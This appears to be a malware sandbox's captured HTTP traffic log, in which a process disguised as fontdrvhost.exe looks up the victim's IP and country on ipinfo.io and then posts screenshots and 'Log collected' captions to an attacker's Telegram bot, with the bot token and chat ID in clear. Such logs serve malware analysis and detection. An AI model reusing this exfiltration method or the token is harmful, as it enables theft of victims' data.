                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uf6zvB1EusELm6YnI%2FjzZm4BzXZcaOjhMupoGhCIAGsBZjMBRv%2B%2BPf%2Fo9KvtiMHyQORY0KdsDf9By6SYv7NyCQf2dFq1aV8ZSw8Y8q6HK9zQ0fUs0v3EbYFdtk2I%2BiYwsoeRIvdX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff805bd8c470-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3865&min_rtt=1474&rtt_var=5335&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=70856&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.44973034.117.59.814435012C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-01-01 13:52:00 UTC61OUTGET /ip HTTP/1.1
                                                                                                                                                                                            Host: ipinfo.io
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            2025-01-01 13:52:00 UTC305INHTTP/1.1 200 OK
                                                                                                                                                                                            date: Wed, 01 Jan 2025 13:51:59 GMT
                                                                                                                                                                                            content-type: text/plain; charset=utf-8
                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2025-01-01 13:52:00 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                            Data Ascii: 8.46.123.189


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.44973134.117.59.814435012C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-01-01 13:52:00 UTC42OUTGET /country HTTP/1.1
                                                                                                                                                                                            Host: ipinfo.io
                                                                                                                                                                                            2025-01-01 13:52:00 UTC448INHTTP/1.1 200 OK
                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                            Content-Length: 3
                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                            date: Wed, 01 Jan 2025 13:52:00 GMT
                                                                                                                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2025-01-01 13:52:00 UTC3INData Raw: 55 53 0a
                                                                                                                                                                                            Data Ascii: US


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            2192.168.2.449732149.154.167.2204435012C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-01-01 13:52:02 UTC255OUTPOST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary="df078fe5-ba23-4170-8bea-85b5048774e2"
                                                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                                                            Content-Length: 86411
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            2025-01-01 13:52:02 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                            2025-01-01 13:52:02 UTC40OUTData Raw: 2d 2d 64 66 30 37 38 66 65 35 2d 62 61 32 33 2d 34 31 37 30 2d 38 62 65 61 2d 38 35 62 35 30 34 38 37 37 34 65 32 0d 0a
                                                                                                                                                                                            Data Ascii: --df078fe5-ba23-4170-8bea-85b5048774e2
                                                                                                                                                                                            2025-01-01 13:52:02 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                                                                                                            2025-01-01 13:52:02 UTC10OUTData Raw: 36 32 38 33 33 37 33 34 34 32
                                                                                                                                                                                            Data Ascii: 6283373442
                                                                                                                                                                                            2025-01-01 13:52:02 UTC131OUTData Raw: 0d 0a 2d 2d 64 66 30 37 38 66 65 35 2d 62 61 32 33 2d 34 31 37 30 2d 38 62 65 61 2d 38 35 62 35 30 34 38 37 37 34 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: --df078fe5-ba23-4170-8bea-85b5048774e2Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                                                                                            2025-01-01 13:52:02 UTC140OUTData Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 36 32 66 62 63 64 63 31 30 66 37 39 37 66 30 36 61 62 32 31 35 33 30 31 33 33 31 33 62 36 66 65 35 36 66 38 34 38 65 35 0a 43 6f 6d 6d 65 6e 74 3a 20 4e 45 57 4f 52 4b 20 50 43 0a 55 73 65 72 6e 61 6d 65 3a 20 6a 6f 6e 65 73 0a 50 43 20 4e 61 6d 65 3a 20 35 37 31 33 34 35 0a 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a 47 45 4f 3a 20 55 53 0a
                                                                                                                                                                                            Data Ascii: new user connect !ID: 62fbcdc10f797f06ab2153013313b6fe56f848e5Comment: NEWORK PCUsername: userPC Name: 571345IP: 8.46.123.189GEO: US
                                                                                                                                                                                            2025-01-01 13:52:02 UTC146OUTData Raw: 0d 0a 2d 2d 64 66 30 37 38 66 65 35 2d 62 61 32 33 2d 34 31 37 30 2d 38 62 65 61 2d 38 35 62 35 30 34 38 37 37 34 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: --df078fe5-ba23-4170-8bea-85b5048774e2Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                                                                                            2025-01-01 13:52:02 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                                                                            Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                                                                                                                            2025-01-01 13:52:02 UTC4096OUTData Raw: 76 a2 80 b8 9d 28 c6 38 a5 26 93 bf 7a 63 03 8a 43 4b 49 48 62 1c fa d2 53 b9 14 84 7f 9c d0 31 b4 a6 8f e9 49 da 81 87 e3 47 7a 3f ce 28 38 a0 04 a4 c7 38 eb 4e ed 49 da 98 c4 3d 31 41 1c d1 d8 75 a2 81 89 8c f4 a0 0a 08 14 60 e3 d6 80 10 d1 fa 51 8f 6a 0f 5a 43 01 d6 93 34 bf d6 92 80 10 d1 9a 28 3d e8 18 87 a5 1f 85 2f 7e 69 33 f5 a6 01 45 19 c5 19 fa 50 02 67 3e 94 a7 9f 6c 7b d2 1e b4 66 90 c0 75 cf e9 47 1f 9d 19 e2 8c 50 30 fc 29 b4 ee df e3 49 f8 53 00 a4 1e f4 a4 52 0e 3d a9 00 51 fe 73 40 eb 45 03 03 49 4b d8 d0 39 a0 06 9a 5c f3 d3 04 d1 df ad 26 71 9f e9 4c 00 f4 a3 8c d1 47 5c d2 18 63 ad 07 39 c7 eb 46 28 fc 29 80 83 93 8e b4 a6 8f f3 c5 20 3f e7 34 00 1e 7f fd 54 66 94 f5 e3 f3 a4 3f 95 21 87 4a 3a d1 49 fc a9 8c ef 28 a6 4d 2a c3 0b 48 df
                                                                                                                                                                                            Data Ascii: v(8&zcCKIHbS1IGz?(88NI=1Au`QjZC4(=/~i3EPg>l{fuGP0)ISR=Qs@EIK9\&qLG\c9F() ?4Tf?!J:I(M*H
                                                                                                                                                                                            2025-01-01 13:52:02 UTC4096OUTData Raw: 22 83 eb 41 39 e2 8e de 94 00 84 7e 20 51 41 e3 de 8a 06 18 c5 14 7e 34 64 d0 02 7e 66 93 bf 6a 53 9c f6 a3 9a 06 84 a4 eb 4b 8e 79 a4 a0 04 3d a8 3d 69 71 fa 52 1e 08 a6 30 34 84 73 4b 46 3f 4f 4a 40 27 5a 05 1c d1 9f c2 98 c4 14 0a 5f 7a 4a 00 3d fa d1 c5 1d 3f 95 19 a0 62 77 1e f4 7f 9e 69 71 41 a0 04 3f ad 06 83 41 f5 a0 04 a0 f4 a5 fc 29 28 18 75 18 1e bd 28 a3 af 5f ce 93 3c 50 01 47 5f ad 28 a4 e9 40 05 25 2e 7f 01 49 40 c0 9e b4 74 e2 83 cd 04 d1 60 03 ef fa d2 52 9f c2 82 31 45 80 4e be 94 76 a0 f5 e3 f1 a2 90 ce ee 8a 5a 29 1f 2c 25 14 b4 50 02 51 41 a2 80 0a 28 a2 81 85 25 2d 14 00 94 51 45 03 0a 28 a5 14 08 4c e2 8a 5a 0d 00 14 52 51 4c 05 a5 dc 69 b9 a2 80 1d 90 7a 8a 4d aa 7a 1c 50 28 a0 04 d8 7b 73 4d c5 3f 26 97 77 ad 1a 0e e4 78 a2 a4 f9
                                                                                                                                                                                            Data Ascii: "A9~ QA~4d~fjSKy==iqR04sKF?OJ@'Z_zJ=?bwiqA?A)(u(_<PG_(@%.I@t`R1ENvZ),%PQA(%-QE(LZRQLizMzP({sM?&wx
                                                                                                                                                                                            2025-01-01 13:52:02 UTC4096OUTData Raw: de ba 7d bb 67 79 ff 00 6d bb ff 00 9e 95 cd 39 b9 41 46 a3 8f 2a b6 ce ed db 6d 3f e1 8e f8 41 46 6e 54 d4 b9 9d f7 56 4a fb eb ff 00 0e 61 dd db c9 6b f0 a7 48 8e 51 86 33 07 c7 b3 79 8c 3f 42 2b 8e af 50 f8 86 02 f8 6e 10 00 00 5d 20 00 7f ba d5 e5 f5 ea e5 53 f6 94 e7 37 d6 4d fe 47 83 9d c3 d9 d6 84 17 48 a5 f8 b0 a2 8a 2b d3 3c 60 a2 8a 29 80 a0 9a 5d fd 88 cd 33 14 53 0b 0e f9 4f b5 27 97 e8 73 49 46 68 01 0a 11 d4 53 6a 50 e4 51 95 3d 56 95 87 72 2a 2a 4d 88 7a 1c 52 18 cf 6e 68 b3 1d c8 cd 14 e2 08 ed 49 48 62 52 52 d1 40 09 45 2d 27 7a 63 10 d1 4b 49 40 09 45 2d 06 81 89 49 4b 45 03 12 8a 28 a0 02 92 96 83 40 0d a2 96 8a 06 36 8a 5c 66 92 98 c4 a2 97 14 50 17 12 8a 5a 29 00 94 7e 14 51 40 09 48 69 68 a0 62 51 41 a2 81 85 25 2d 25 00 14 94 b4 53
                                                                                                                                                                                            Data Ascii: }gym9AF*m?AFnTVJakHQ3y?B+Pn] S7MGH+<`)]3SO'sIFhSjPQ=Vr**MzRnhIHbRR@E-'zcKI@E-IKE(@6\fPZ)~Q@HihbQA%-%S
                                                                                                                                                                                            2025-01-01 13:52:03 UTC1584INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:03 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Content-Length: 1195
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                            {"ok":true,"result":{"message_id":781,"from":{"id":8143016568,"is_bot":true,"first_name":"\u0411\u041e\u0422\u0418\u041a","username":"Heusjsjs628_bot"},"chat":{"id":6283373442,"first_name":"Loftan","username":"Lofty_Code","type":"private"},"date":1735739523,"photo":[{"file_id":"AgACAgEAAxkDAAIDDWd1SIPknbLjawrSogMlhEn9JTmAAAJqrDEbCc2pRx6crcGEUbrmAQADAgADcwADNgQ","file_unique_id":"AQADaqwxGwnNqUd4","file_size":1089,"width":90,"height":72},{"file_id":"AgACAgEAAxkDAAIDDWd1SIPknbLjawrSogMlhEn9JTmAAAJqrDEbCc2pRx6crcGEUbrmAQADAgADbQADNgQ","file_unique_id":"AQADaqwxGwnNqUdy","file_size":13912,"width":320,"height":256},{"file_id":"AgACAgEAAxkDAAIDDWd1SIPknbLjawrSogMlhEn9JTmAAAJqrDEbCc2pRx6crcGEUbrmAQADAgADeAADNgQ","file_unique_id":"AQADaqwxGwnNqUd9","file_size":58173,"width":800,"height":640},{"file_id":"AgACAgEAAxkDAAIDDWd1SIPknbLjawrSogMlhEn9JTmAAAJqrDEbCc2pRx6crcGEUbrmAQADAgADeQADNgQ","file_unique_id":"AQADaqwxGwnNqUd-","file_size":85811,"width":1280,"height":1024}],"caption":"new user connect !\nID: 62fbcdc10f797f [TRUNCATED]


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            3192.168.2.44974434.117.59.814436324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-01-01 13:52:12 UTC61OUTGET /ip HTTP/1.1
                                                                                                                                                                                            Host: ipinfo.io
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            2025-01-01 13:52:12 UTC305INHTTP/1.1 200 OK
                                                                                                                                                                                            date: Wed, 01 Jan 2025 13:52:12 GMT
                                                                                                                                                                                            content-type: text/plain; charset=utf-8
                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2025-01-01 13:52:12 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                            Data Ascii: 8.46.123.189


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            4192.168.2.44974934.117.59.814436324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-01-01 13:52:13 UTC42OUTGET /country HTTP/1.1
                                                                                                                                                                                            Host: ipinfo.io
                                                                                                                                                                                            2025-01-01 13:52:13 UTC448INHTTP/1.1 200 OK
                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                            Content-Length: 3
                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                            date: Wed, 01 Jan 2025 13:52:13 GMT
                                                                                                                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2025-01-01 13:52:13 UTC3INData Raw: 55 53 0a
                                                                                                                                                                                            Data Ascii: US


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            5192.168.2.449753149.154.167.2204436324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-01-01 13:52:13 UTC255OUTPOST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary="a8ac2ac3-d8f0-4277-97c7-16037a3c7cfa"
                                                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                                                            Content-Length: 92361
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            2025-01-01 13:52:14 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                            2025-01-01 13:52:14 UTC40OUTData Raw: 2d 2d 61 38 61 63 32 61 63 33 2d 64 38 66 30 2d 34 32 37 37 2d 39 37 63 37 2d 31 36 30 33 37 61 33 63 37 63 66 61 0d 0a
                                                                                                                                                                                            Data Ascii: --a8ac2ac3-d8f0-4277-97c7-16037a3c7cfa
                                                                                                                                                                                            2025-01-01 13:52:14 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                                                                                                            2025-01-01 13:52:14 UTC10OUTData Raw: 36 32 38 33 33 37 33 34 34 32
                                                                                                                                                                                            Data Ascii: 6283373442
                                                                                                                                                                                            2025-01-01 13:52:14 UTC131OUTData Raw: 0d 0a 2d 2d 61 38 61 63 32 61 63 33 2d 64 38 66 30 2d 34 32 37 37 2d 39 37 63 37 2d 31 36 30 33 37 61 33 63 37 63 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: --a8ac2ac3-d8f0-4277-97c7-16037a3c7cfaContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                                                                                            2025-01-01 13:52:14 UTC93OUTData Raw: 4c 6f 67 20 63 6f 6c 6c 65 63 74 65 64 0a 49 44 3a 20 36 32 66 62 63 64 63 31 30 66 37 39 37 66 30 36 61 62 32 31 35 33 30 31 33 33 31 33 62 36 66 65 35 36 66 38 34 38 65 35 0a 43 6f 6d 6d 65 6e 74 3a 20 4e 45 57 4f 52 4b 20 50 43 0a 4c 6f 67 20 73 69 7a 65 3a 20 38 36 33 30 34
                                                                                                                                                                                            Data Ascii: Log collectedID: 62fbcdc10f797f06ab2153013313b6fe56f848e5Comment: NEWORK PCLog size: 86304
                                                                                                                                                                                            2025-01-01 13:52:14 UTC146OUTData Raw: 0d 0a 2d 2d 61 38 61 63 32 61 63 33 2d 64 38 66 30 2d 34 32 37 37 2d 39 37 63 37 2d 31 36 30 33 37 61 33 63 37 63 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: --a8ac2ac3-d8f0-4277-97c7-16037a3c7cfaContent-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                                                                                            2025-01-01 13:52:14 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                                                                            Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                                                                                                                            2025-01-01 13:52:14 UTC4096OUTData Raw: d3 dd 34 8f 9f e2 1c 56 1a b6 12 d0 9c 64 ee b6 69 b3 0a 8a 5a 2b f4 03 e1 84 a2 96 92 80 0a f4 5f 85 bf f2 2f 5f ff 00 d8 42 4f fd 01 2b ce ab d1 7e 17 7f c8 bd 7f ff 00 61 09 3f f4 04 af 9f cf 7f e5 d7 ab fc 8f af e1 7f e1 62 7d 23 f9 9a d7 3e 0f b3 bd d7 1f 51 bb 9e 59 a3 79 16 53 6c c0 6c 2c aa 02 e4 f5 20 63 21 4f 19 27 d4 d7 45 5c 57 8d f4 2b dd 7b 57 d2 a0 b4 b7 89 87 d9 6e d4 dc 4c 1b 6d b3 37 95 b5 c1 50 7e 71 82 54 64 67 07 9a e4 35 1d 0f 52 7b 4d 62 3b 1d 32 fc 5d 19 f5 03 77 37 90 cb f6 a8 98 b7 94 07 1f bc 24 ed 61 8c e0 03 eb 5e 04 61 18 de cb 73 e8 ea d7 a9 55 45 4d dd 25 64 7b 25 79 47 c4 6f f9 1c ed ff 00 ec 1e bf fa 31 eb d1 74 2d 37 fb 27 49 8a cc c5 67 1b 29 62 56 ce 13 14 5c 92 78 52 49 1f 9d 79 d7 c4 6f f9 1c ed ff 00 ec 1e bf fa 31
                                                                                                                                                                                            Data Ascii: 4VdiZ+_/_BO+~a?b}#>QYySll, c!O'E\W+{WnLm7P~qTdg5R{Mb;2]w7$a^asUEM%d{%yGo1t-7'Ig)bV\xRIyo1
                                                                                                                                                                                            2025-01-01 13:52:14 UTC4096OUTData Raw: bb f3 c6 31 f3 00 41 ea 09 eb cd 51 f1 05 de 96 34 c7 b3 d3 7c e5 0d a4 34 22 06 89 bf 75 2b de ac c6 20 71 82 02 ee c3 74 20 0e fc 57 44 55 49 c9 50 4f ae 29 0c 51 37 26 34 27 dd 45 70 57 ca e3 56 a3 a9 cd 66 dd ff 00 0b 1e ae 17 3b a9 87 84 61 cb 74 bf ce e5 3d 47 5a d3 f5 5f 17 c1 ae 4d 21 87 ec 3a 9c 46 37 30 c9 b2 e2 d4 4b b8 32 a8 5c a3 ae 58 91 81 b8 1c fd ec ee aa ba cd e0 d2 b5 3f b4 43 a7 83 3d b9 16 e2 0d 3a 28 99 dc 4f 1b 80 59 23 07 05 55 89 cf 1c 73 ce 2b 5b ca 8c 8c 79 69 8f 4d b4 be 5a 60 0d 8b c7 4e 2b 38 e5 10 8c 79 79 ba 7e 65 4b 3d 9b 92 6a 2b 7b fd db 22 ad b1 d3 86 a9 75 aa da 6a 36 c2 e6 57 9a ee de d2 e3 30 ca 64 70 4f 96 f2 38 11 28 04 9f 9b 7f 20 70 32 70 29 24 da 41 87 ec 2d 15 fb 40 ba 59 d3 da fb cf cc 3b cf ef 0c 9e 48 8b 71
                                                                                                                                                                                            Data Ascii: 1AQ4|4"u+ qt WDUIPO)Q7&4'EpWVf;at=GZ_M!:F70K2\X?C=:(OY#Us+[yiMZ`N+8yy~eK=j+{"uj6W0dpO8( p2p)$A-@Y;Hq
                                                                                                                                                                                            2025-01-01 13:52:14 UTC4096OUTData Raw: 7a 52 77 a3 ad 00 14 9f 9d 29 f5 a4 20 63 de 90 c4 c7 d3 14 52 e2 90 fb d3 40 21 a2 94 f4 a3 b7 f4 a0 63 4f 5f 4a 31 de 97 20 0a 43 d2 80 0a 4c 63 fa 52 fe 94 62 81 89 46 78 a2 83 40 20 e9 47 7f 5a 3a d2 66 81 85 1f d2 8e fd 28 34 00 94 7a f1 4a 69 28 18 77 a2 83 fe 45 18 fe 5d 68 01 09 cd 14 bc d2 03 40 c0 d2 1f 4a 5f 4a 28 01 08 a2 96 93 a5 00 1f 4a 3a d1 de 8a 00 28 fa 51 d6 92 81 9d ed 53 d4 ff 00 e4 19 71 fe e1 fe 55 73 bd 53 d5 3f e4 1b 71 fe e1 fe 55 cf 89 fe 0c fd 1f e4 78 18 0f f7 aa 5f e2 5f 99 c4 d1 45 15 f9 51 fd 22 7a 74 5e 0d d1 1b c2 0c e2 d6 77 bc 6d 11 b5 51 7f e6 9c 2b af 58 b6 74 c7 bf 27 ad 79 8d 7b 6e 83 65 aa 49 f0 42 6b 78 d5 5e f2 e2 29 45 a4 67 87 30 96 cb 28 ee 49 01 c8 1f 4a f1 2a de b4 52 51 69 74 3c cc be a4 a7 2a aa 52 bd a5
                                                                                                                                                                                            Data Ascii: zRw) cR@!cO_J1 CLcRbFx@ GZ:f(4zJi(wE]h@J_J(J:(QSqUsS?qUx__EQ"zt^wmQ+Xt'y{neIBkx^)Eg0(IJ*RQit<*R
                                                                                                                                                                                            2025-01-01 13:52:15 UTC1474INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:15 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Content-Length: 1085
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
